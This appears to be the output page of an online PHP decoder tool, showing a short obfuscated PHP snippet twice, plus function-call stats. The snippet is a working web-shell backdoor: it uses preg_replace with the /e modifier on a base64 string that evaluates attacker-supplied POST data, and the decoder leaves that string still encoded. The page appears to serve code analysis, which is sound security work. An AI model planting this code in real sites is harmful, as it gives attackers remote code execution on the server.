Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @$a = $_POST['x']; if(isset($a)){ @preg_replace("/\[(.*)\]/e",'\\1',base64_decode..
Decoded Output download
<?php
@$a = $_POST['x'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>
Did this file decode correctly?
Original Code
<?php
@$a = $_POST['x'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>
Function Calls
preg_replace | 1 |
base64_decode | 1 |
Stats
MD5 | 103accb9425879d06b9d57d0e36e01af |
Eval Count | 0 |
Decode Time | 123 ms |